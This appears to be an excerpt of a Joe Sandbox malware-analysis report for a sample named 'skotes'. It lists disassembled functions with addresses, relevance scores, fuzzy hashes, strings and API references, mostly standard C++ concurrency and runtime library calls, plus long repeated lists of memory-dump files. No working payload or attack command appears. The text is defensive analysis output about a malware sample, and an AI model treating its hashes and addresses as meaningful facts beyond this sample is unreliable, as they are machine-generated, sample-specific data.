Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: dcaa2457562bf01db6f6831ff4409fee1dc154835748ad1d048bd3b90cfe4de8
Instruction ID: 96416cec23dd72aab75566d15f7030c8a0df5205426696de57e144c0a9b0b94f
Opcode Fuzzy Hash: dcaa2457562bf01db6f6831ff4409fee1dc154835748ad1d048bd3b90cfe4de8
Instruction Fuzzy Hash: 6E11D635A01214DBCF15FF18D8A9BAD7765AF84360B954065E8129B341DF7CED01CBD0

Function 00797630 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00797654
__Mtx_unlock.LIBCPMT ref: 007976AA

Strings

=L-t, xrefs: 00797641, 00797691

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID: =L-t
API String ID: 1418687624-768041998
Opcode ID: a6e986b586ca2ee40827f6c4757d31d6aeb22490aa95b257d02e6c5bfe398e71
Instruction ID: 14415005da7d01abc1559dba36eb1f63e94b0e46ff40bea90e80c7140cde6ec9
Opcode Fuzzy Hash: a6e986b586ca2ee40827f6c4757d31d6aeb22490aa95b257d02e6c5bfe398e71
Instruction Fuzzy Hash: 130122B1908A48EBDF15CF68ED05F52B7ACE709B20F00466AFC1583B91EB3E9810C651

Function 007A0C5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 007A0CD7
Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 007A0D2A

Strings

p[~, xrefs: 007A0CCF

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
String ID: p[~
API String ID: 3303180142-1161980390
Opcode ID: bd6a898ed952844421274940d061c3f160715c2b6348274d4722f441bb07ff6f
Instruction ID: 7e9c8e0836939d80eb87110518901ecc4192fde22269b3f0f98351b9e7bd3c5f
Opcode Fuzzy Hash: bd6a898ed952844421274940d061c3f160715c2b6348274d4722f441bb07ff6f
Instruction Fuzzy Hash: 5D01B571E06608DFCB10ABF8655935D66E0AB8E314F604A6EF405EB282DE7C4E4087A6

Function 0079CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

CreateSemaphoreExW.KERNEL32(?,007A65E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0079CAFC
CreateSemaphoreW.KERNEL32(?,007A65E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0079CB1E

Strings

ez, xrefs: 0079CB12, 0079CAF0

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateSemaphore
String ID: ez
API String ID: 1078844751-1282118492
Opcode ID: 20c49d00089051a89a3ccd51b30c6f02809dc3bdce593b1b89e6faf961e9b478
Instruction ID: 784037795e90bdac53aa7830dab3fba8baf441c99aa633487b6bd962bc68810d
Opcode Fuzzy Hash: 20c49d00089051a89a3ccd51b30c6f02809dc3bdce593b1b89e6faf961e9b478
Instruction Fuzzy Hash: E3F0D476502169ABCF239F90EC059AE7F66FF08B60B048015FD096A130C7369C61EFE4

Function 00782B30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00782B63

Strings

This function cannot be called on a default constructed task, xrefs: 00782B43
=L-t, xrefs: 00782B36

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: =L-t$This function cannot be called on a default constructed task
API String ID: 2659868963-980932591
Opcode ID: 55f5302d677da3b3b2694febb2923dd32a24b5eff10069459c768914c0b80376
Instruction ID: 6b8513af159f271b8ef978409489ffec06d244ada14d381e1b5a2080d3f1b61b
Opcode Fuzzy Hash: 55f5302d677da3b3b2694febb2923dd32a24b5eff10069459c768914c0b80376
Instruction Fuzzy Hash: A9F0A771D1020C9BC710DF68984199EF7F9EF15300F5042AEF84167301EB751A588B95

Function 007AB92C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 007AB94E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 007AB961

Strings

pContext, xrefs: 007AB959

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 9d8b7043ff193b1ea94b9217b8ed478c7b3a719fb9a661c68770b4f26c4a86d2
Instruction ID: ffe37c9f8ffe717f80e138daff671d17d3be732d5414694a71df697d73674349
Opcode Fuzzy Hash: 9d8b7043ff193b1ea94b9217b8ed478c7b3a719fb9a661c68770b4f26c4a86d2
Instruction Fuzzy Hash: 17E06879B00208E7CF04F768EC4DD9EBB799EC47107004126E511A3381EB7CAA04CAD0

Function 007A34CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A34FC

Strings

pScheduler, xrefs: 007A34F4
version, xrefs: 007A34E1

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
